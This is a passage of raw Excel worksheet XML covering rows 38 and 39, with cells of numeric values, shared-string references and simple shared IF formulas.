      <c r="BD38" s="102">
        <v>0.0</v>
      </c>
      <c r="BE38" s="102">
        <v>0.0</v>
      </c>
      <c r="BF38" s="102">
        <v>0.0</v>
      </c>
      <c r="BG38" s="102">
        <v>0.0</v>
      </c>
      <c r="BH38" s="102">
        <v>0.0</v>
      </c>
      <c r="BI38" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ38" s="102">
        <v>0.0</v>
      </c>
      <c r="BK38" s="102">
        <v>0.0</v>
      </c>
      <c r="BL38" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM38" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN38" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO38" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP38" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ38" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR38" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS38" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT38" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU38" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV38" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW38" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX38" s="104">
        <v>0.0</v>
      </c>
      <c r="BY38" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ38" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA38" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB38" s="104">
        <v>0.0</v>
      </c>
      <c r="CC38" s="104">
        <v>0.0</v>
      </c>
      <c r="CD38" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE38" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF38" s="104" t="str">
        <f t="shared" ref="CF38:CF57" si="90">IF(CD38="-",CE38,CD38)</f>
        <v>-</v>
      </c>
      <c r="CG38" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH38" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI38" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ38" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK38" s="104">
        <v>0.0</v>
      </c>
      <c r="CL38" s="104">
        <v>0.0</v>
      </c>
      <c r="CM38" s="105">
        <v>0.0</v>
      </c>
      <c r="CN38" s="105">
        <v>0.0</v>
      </c>
      <c r="CO38" s="105">
        <v>0.0</v>
      </c>
      <c r="CP38" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ38" s="105">
        <v>0.0</v>
      </c>
      <c r="CR38" s="105">
        <v>0.0</v>
      </c>
      <c r="CS38" s="105">
        <v>0.0</v>
      </c>
      <c r="CT38" s="105">
        <v>0.0</v>
      </c>
      <c r="CU38" s="105">
        <v>0.0</v>
      </c>
      <c r="CV38" s="105">
        <v>0.0</v>
      </c>
      <c r="CW38" s="105">
        <v>0.0</v>
      </c>
      <c r="CX38" s="105">
        <v>0.0</v>
      </c>
      <c r="CY38" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ38" s="105">
        <v>0.0</v>
      </c>
      <c r="DA38" s="105">
        <v>0.0</v>
      </c>
      <c r="DB38" s="106">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="DC38" s="106">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="DD38" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE38" s="106">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="DF38" s="106">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="DG38" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH38" s="106">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="DI38" s="106">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="DJ38" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK38" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL38" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM38" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DN38" s="108">
        <v>0.0</v>
      </c>
      <c r="DO38" s="108">
        <v>0.0</v>
      </c>
      <c r="DP38" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ38" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR38" s="108">
        <v>0.0</v>
      </c>
      <c r="DS38" s="108">
        <v>0.0</v>
      </c>
      <c r="DT38" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU38" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV38" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DW38" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX38" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY38" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ38" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA38" s="108">
        <v>0.0</v>
      </c>
      <c r="EB38" s="108">
        <v>0.0</v>
      </c>
      <c r="EC38" s="109">
        <v>0.0</v>
      </c>
      <c r="ED38" s="109">
        <v>0.0</v>
      </c>
      <c r="EE38" s="109">
        <v>0.0</v>
      </c>
      <c r="EF38" s="109">
        <v>0.0</v>
      </c>
      <c r="EG38" s="109">
        <v>0.0</v>
      </c>
      <c r="EH38" s="109">
        <v>0.0</v>
      </c>
      <c r="EI38" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ38" s="109">
        <v>0.0</v>
      </c>
      <c r="EK38" s="109">
        <v>0.0</v>
      </c>
      <c r="EL38" s="109">
        <v>0.0</v>
      </c>
      <c r="EM38" s="109">
        <v>0.0</v>
      </c>
      <c r="EN38" s="109">
        <v>0.0</v>
      </c>
      <c r="EO38" s="109">
        <v>0.0</v>
      </c>
      <c r="EP38" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ38" s="109">
        <v>0.0</v>
      </c>
      <c r="ER38" s="110">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="ES38" s="110">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="ET38" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU38" s="110">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="EV38" s="110">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="EW38" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX38" s="110">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="EY38" s="110">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="EZ38" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA38" s="110">
        <f t="shared" si="79"/>
        <v>0</v>
      </c>
      <c r="FB38" s="110">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="FC38" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FD38" s="111">
        <v>0.0</v>
      </c>
      <c r="FE38" s="111">
        <v>0.0</v>
      </c>
      <c r="FF38" s="101" t="s">
        <v>12</v>
      </c>
      <c r="FG38" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FH38" s="111">
        <v>0.0</v>
      </c>
      <c r="FI38" s="111">
        <v>0.0</v>
      </c>
      <c r="FJ38" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FK38" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FL38" s="111" t="str">
        <f t="shared" si="69"/>
        <v>-</v>
      </c>
      <c r="FM38" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN38" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FO38" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP38" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ38" s="111">
        <v>0.0</v>
      </c>
      <c r="FR38" s="111">
        <v>0.0</v>
      </c>
      <c r="FS38" s="112">
        <v>0.0</v>
      </c>
      <c r="FT38" s="112">
        <v>0.0</v>
      </c>
      <c r="FU38" s="112">
        <v>0.0</v>
      </c>
      <c r="FV38" s="112">
        <v>0.0</v>
      </c>
      <c r="FW38" s="112">
        <v>0.0</v>
      </c>
      <c r="FX38" s="112">
        <v>0.0</v>
      </c>
      <c r="FY38" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ38" s="112">
        <v>0.0</v>
      </c>
      <c r="GA38" s="112">
        <v>0.0</v>
      </c>
      <c r="GB38" s="112">
        <v>0.0</v>
      </c>
      <c r="GC38" s="112">
        <v>0.0</v>
      </c>
      <c r="GD38" s="112">
        <v>0.0</v>
      </c>
      <c r="GE38" s="112">
        <v>0.0</v>
      </c>
      <c r="GF38" s="112">
        <v>0.0</v>
      </c>
      <c r="GG38" s="112">
        <v>0.0</v>
      </c>
      <c r="GH38" s="113">
        <f t="shared" si="39"/>
        <v>0</v>
      </c>
      <c r="GI38" s="113">
        <f t="shared" si="40"/>
        <v>0</v>
      </c>
      <c r="GJ38" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK38" s="113">
        <f t="shared" si="42"/>
        <v>0</v>
      </c>
      <c r="GL38" s="113">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="GM38" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN38" s="113">
        <f t="shared" si="45"/>
        <v>0</v>
      </c>
      <c r="GO38" s="113">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="GP38" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ38" s="114">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="GR38" s="113">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="GS38" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT38" s="94"/>
      <c r="GU38" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV38" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW38" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX38" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY38" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ38" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA38" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB38" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC38" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD38" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE38" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF38" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG38" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH38" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI38" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ38" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK38" s="93" t="str">
        <f t="shared" si="51"/>
        <v>NO</v>
      </c>
      <c r="HL38" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HM38" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN38" s="93">
        <v>0.0</v>
      </c>
      <c r="HO38" s="93">
        <v>0.0</v>
      </c>
      <c r="HP38" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ38" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR38" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS38" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT38" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU38" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV38" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW38" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX38" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY38" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ38" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA38" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB38" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC38" s="120" t="str">
        <f t="shared" si="88"/>
        <v>-</v>
      </c>
      <c r="ID38" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE38" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF38" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG38" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH38" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II38" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ38" s="98" t="str">
        <f t="shared" si="56"/>
        <v>NO</v>
      </c>
      <c r="IK38" s="99">
        <v>0.0</v>
      </c>
      <c r="IL38" s="99">
        <v>0.0</v>
      </c>
      <c r="IM38" s="121">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="IN38" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO38" s="98">
        <v>0.0</v>
      </c>
      <c r="IP38" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ38" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR38" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS38" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT38" s="127"/>
      <c r="IU38" s="127"/>
      <c r="IV38" s="127"/>
      <c r="IW38" s="127"/>
      <c r="IX38" s="127"/>
      <c r="IY38" s="127"/>
      <c r="IZ38" s="127"/>
      <c r="JA38" s="127"/>
      <c r="JB38" s="127"/>
      <c r="JC38" s="127"/>
      <c r="JD38" s="127"/>
      <c r="JE38" s="127"/>
      <c r="JF38" s="127"/>
      <c r="JG38" s="127"/>
      <c r="JH38" s="127"/>
      <c r="JI38" s="127"/>
      <c r="JJ38" s="127"/>
      <c r="JK38" s="127"/>
      <c r="JL38" s="127"/>
      <c r="JM38" s="127"/>
      <c r="JN38" s="127"/>
      <c r="JO38" s="127"/>
      <c r="JP38" s="127"/>
      <c r="JQ38" s="127"/>
      <c r="JR38" s="127"/>
      <c r="JS38" s="127"/>
      <c r="JT38" s="127"/>
      <c r="JU38" s="127"/>
      <c r="JV38" s="127"/>
      <c r="JW38" s="127"/>
      <c r="JX38" s="127"/>
      <c r="JY38" s="127"/>
      <c r="JZ38" s="127"/>
      <c r="KA38" s="127"/>
      <c r="KB38" s="127"/>
      <c r="KC38" s="127"/>
      <c r="KD38" s="127"/>
      <c r="KE38" s="127"/>
      <c r="KF38" s="127"/>
      <c r="KG38" s="127"/>
      <c r="KH38" s="127"/>
      <c r="KI38" s="127"/>
      <c r="KJ38" s="127"/>
      <c r="KK38" s="127"/>
      <c r="KL38" s="127"/>
      <c r="KM38" s="127"/>
      <c r="KN38" s="127"/>
      <c r="KO38" s="127"/>
      <c r="KP38" s="127"/>
      <c r="KQ38" s="127"/>
      <c r="KR38" s="127"/>
      <c r="KS38" s="127"/>
      <c r="KT38" s="127"/>
      <c r="KU38" s="127"/>
      <c r="KV38" s="127"/>
      <c r="KW38" s="127"/>
      <c r="KX38" s="127"/>
      <c r="KY38" s="127"/>
      <c r="KZ38" s="127"/>
      <c r="LA38" s="127"/>
      <c r="LB38" s="127"/>
      <c r="LC38" s="127"/>
      <c r="LD38" s="127"/>
      <c r="LE38" s="127"/>
      <c r="LF38" s="127"/>
      <c r="LG38" s="127"/>
      <c r="LH38" s="127"/>
      <c r="LI38" s="127"/>
      <c r="LJ38" s="127"/>
      <c r="LK38" s="127"/>
      <c r="LL38" s="127"/>
      <c r="LM38" s="127"/>
      <c r="LN38" s="127"/>
      <c r="LO38" s="127"/>
      <c r="LP38" s="127"/>
      <c r="LQ38" s="127"/>
      <c r="LR38" s="127"/>
      <c r="LS38" s="127"/>
      <c r="LT38" s="127"/>
      <c r="LU38" s="127"/>
      <c r="LV38" s="127"/>
      <c r="LW38" s="127"/>
      <c r="LX38" s="127"/>
      <c r="LY38" s="127"/>
      <c r="LZ38" s="127"/>
      <c r="MA38" s="127"/>
      <c r="MB38" s="127"/>
      <c r="MC38" s="127"/>
      <c r="MD38" s="127"/>
      <c r="ME38" s="127"/>
      <c r="MF38" s="127"/>
      <c r="MG38" s="127"/>
      <c r="MH38" s="127"/>
      <c r="MI38" s="127"/>
      <c r="MJ38" s="127"/>
      <c r="MK38" s="127"/>
      <c r="ML38" s="127"/>
      <c r="MM38" s="127"/>
      <c r="MN38" s="127"/>
      <c r="MO38" s="127"/>
      <c r="MP38" s="127"/>
      <c r="MQ38" s="127"/>
      <c r="MR38" s="127"/>
      <c r="MS38" s="127"/>
      <c r="MT38" s="127"/>
      <c r="MU38" s="127"/>
      <c r="MV38" s="127"/>
      <c r="MW38" s="127"/>
      <c r="MX38" s="127"/>
      <c r="MY38" s="127"/>
      <c r="MZ38" s="127"/>
      <c r="NA38" s="127"/>
      <c r="NB38" s="127"/>
      <c r="NC38" s="127"/>
      <c r="ND38" s="127"/>
      <c r="NE38" s="127"/>
      <c r="NF38" s="127"/>
      <c r="NG38" s="127"/>
      <c r="NH38" s="127"/>
      <c r="NI38" s="127"/>
      <c r="NJ38" s="127"/>
      <c r="NK38" s="127"/>
      <c r="NL38" s="127"/>
      <c r="NM38" s="127"/>
      <c r="NN38" s="127"/>
      <c r="NO38" s="127"/>
      <c r="NP38" s="127"/>
      <c r="NQ38" s="127"/>
      <c r="NR38" s="127"/>
      <c r="NS38" s="127"/>
      <c r="NT38" s="127"/>
      <c r="NU38" s="127"/>
      <c r="NV38" s="127"/>
      <c r="NW38" s="127"/>
      <c r="NX38" s="127"/>
      <c r="NY38" s="127"/>
    </row>
    <row r="39" ht="153.75" customHeight="1">
      <c r="B39" s="89" t="s">
        <v>244</v>
      </c>
      <c r="C39" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D39" s="90" t="s">
        <v>245</v>
      </c>
      <c r="E39" s="90" t="s">
        <v>822</v>
      </c>
      <c r="F39" s="90" t="s">
        <v>823</v>
      </c>
      <c r="G39" s="90" t="s">
        <v>850</v>
      </c>
      <c r="H39" s="90" t="s">
        <v>851</v>
      </c>
      <c r="I39" s="92" t="s">
        <v>859</v>
      </c>
      <c r="J39" s="92" t="s">
        <v>860</v>
      </c>
      <c r="K39" s="92" t="s">
        <v>861</v>
      </c>
      <c r="L39" s="93" t="s">
        <v>317</v>
      </c>
      <c r="M39" s="93">
        <v>1.0</v>
      </c>
      <c r="N39" s="93">
        <v>1.0</v>
      </c>
      <c r="O39" s="93">
        <v>0.0</v>
      </c>
      <c r="P39" s="93">
        <v>1.0</v>
      </c>
      <c r="Q39" s="93">
        <f t="shared" si="70"/>
        <v>1</v>
      </c>
      <c r="R39" s="93">
        <v>1.0</v>
      </c>
      <c r="S39" s="93">
        <v>0.0</v>
      </c>
      <c r="T39" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U39" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V39" s="126" t="s">
        <v>862</v>
      </c>
      <c r="W39" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X39" s="97" t="s">
        <v>512</v>
      </c>
      <c r="Y39" s="96" t="s">
        <v>863</v>
      </c>
      <c r="Z39" s="96" t="s">
        <v>512</v>
      </c>
      <c r="AA39" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB39" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC39" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD39" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE39" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF39" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG39" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH39" s="99" t="s">
        <v>864</v>
      </c>
      <c r="AI39" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ39" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK39" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL39" s="100">
        <v>0.0</v>
      </c>
      <c r="AM39" s="100">
        <v>0.0</v>
      </c>
      <c r="AN39" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO39" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP39" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ39" s="100">
        <v>0.0</v>
      </c>
      <c r="AR39" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS39" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT39" s="100" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="AU39" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV39" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW39" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX39" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY39" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ39" s="100">
        <v>0.0</v>
      </c>
      <c r="BA39" s="102">
        <v>190300.0</v>
      </c>
      <c r="BB39" s="102">
        <v>0.0</v>
      </c>
      <c r="BC39" s="102">
        <v>0.0</v>
      </c>
      <c r="BD39" s="102">
        <v>0.0</v>
      </c>
      <c r="BE39" s="102">
        <v>0.0</v>
      </c>
      <c r="BF39" s="102">
        <v>0.0</v>
      </c>
      <c r="BG39" s="102">
        <v>0.0</v>
      </c>
      <c r="BH39" s="102">
        <v>0.0</v>
      </c>
      <c r="BI39" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ39" s="102">
        <v>0.0</v>
      </c>
      <c r="BK39" s="102">
        <v>0.0</v>
      </c>
      <c r="BL39" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM39" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN39" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO39" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP39" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ39" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR39" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS39" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT39" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU39" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV39" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW39" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX39" s="104">
        <v>0.0</v>
      </c>
      <c r="BY39" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ39" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA39" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB39" s="104">
        <v>0.0</v>
      </c>
      <c r="CC39" s="104">
        <v>0.0</v>
      </c>
      <c r="CD39" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE39" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF39" s="104" t="str">
        <f t="shared" si="90"/>
        <v>-</v>
      </c>
      <c r="CG39" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH39" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI39" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ39" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK39" s="104">
        <v>0.0</v>
      </c>
      <c r="CL39" s="104">
        <v>0.0</v>
      </c>
      <c r="CM39" s="105">
        <v>190300.0</v>
      </c>
      <c r="CN39" s="105">
        <v>0.0</v>
      </c>
      <c r="CO39" s="105">
        <v>0.0</v>
      </c>
      <c r="CP39" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ39" s="105">
        <v>0.0</v>
      </c>
      <c r="CR39" s="105">
        <v>0.0</v>
      </c>
      <c r="CS39" s="105">
        <v>0.0</v>
      </c>
      <c r="CT39" s="105">
        <v>0.0</v>
      </c>
      <c r="CU39" s="105">
        <v>0.0</v>
      </c>
      <c r="CV39" s="105">
        <v>0.0</v>
      </c>
      <c r="CW39" s="105">
        <v>0.0</v>
      </c>
      <c r="CX39" s="105">
        <v>0.0</v>
      </c>
      <c r="CY39" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ39" s="105">
        <v>0.0</v>
      </c>
      <c r="DA39" s="105">
        <v>0.0</v>
      </c>
      <c r="DB39" s="106">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="DC39" s="106">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="DD39" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE39" s="106">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="DF39" s="106">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="DG39" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH39" s="106">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="DI39" s="106">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="DJ39" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK39" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL39" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM39" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DN39" s="108">
        <v>0.0</v>
      </c>
      <c r="DO39" s="108">
        <v>0.0</v>
      </c>
      <c r="DP39" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ39" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR39" s="108">
        <v>0.0</v>
      </c>
      <c r="DS39" s="108">
        <v>0.0</v>
      </c>
      <c r="DT39" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU39" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV39" s="108" t="str">
        <f t="shared" ref="DV39:DV67" si="91">IF(DT39="-",DU39,DT39)</f>
        <v>-</v>
      </c>
      <c r="DW39" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX39" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY39" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ39" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA39" s="108">
        <v>0.0</v>
      </c>
      <c r="EB39" s="108">
        <v>0.0</v>
      </c>
      <c r="EC39" s="109">
        <v>190300.0</v>
      </c>
      <c r="ED39" s="109">
        <v>0.0</v>
      </c>
      <c r="EE39" s="109">
        <v>0.0</v>
      </c>
      <c r="EF39" s="109">
        <v>0.0</v>
      </c>
      <c r="EG39" s="109">
        <v>0.0</v>
      </c>
      <c r="EH39" s="109">
        <v>0.0</v>
      </c>
      <c r="EI39" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ39" s="109">
        <v>0.0</v>
      </c>
      <c r="EK39" s="109">
        <v>0.0</v>
      </c>
      <c r="EL39" s="109">
        <v>0.0</v>
      </c>
      <c r="EM39" s="109">
        <v>0.0</v>
      </c>
      <c r="EN39" s="109">
        <v>0.0</v>
      </c>
      <c r="EO39" s="109">
        <v>0.0</v>
      </c>
      <c r="EP39" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ39" s="109">
        <v>0.0</v>
      </c>
      <c r="ER39" s="110">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="ES39" s="110">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="ET39" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU39" s="110">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="EV39" s="110">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="EW39" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX39" s="110">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="EY39" s="110">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="EZ39" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA39" s="110">
        <f t="shared" si="79"/>
        <v>0</v>
      </c>
      <c r="FB39" s="110">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="FC39" s="111" t="s">
        <v>423</v>
      </c>
      <c r="FD39" s="111">
        <v>2.0</v>
      </c>
      <c r="FE39" s="111">
        <v>48.0</v>
      </c>
      <c r="FF39" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG39" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FH39" s="111">
        <v>0.0</v>
      </c>
      <c r="FI39" s="111">
        <v>0.0</v>
      </c>
      <c r="FJ39" s="111" t="s">
        <v>423</v>
      </c>
      <c r="FK39" s="111" t="s">
        <v>423</v>
      </c>
      <c r="FL39" s="111" t="str">
        <f t="shared" si="69"/>
        <v>2002749, 2002752</v>
      </c>
      <c r="FM39" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN39" s="111" t="s">
        <v>423</v>
      </c>
      <c r="FO39" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP39" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ39" s="111">
        <v>0.0</v>
      </c>
      <c r="FR39" s="111">
        <v>0.0</v>
      </c>
      <c r="FS39" s="112">
        <v>190300.0</v>
      </c>
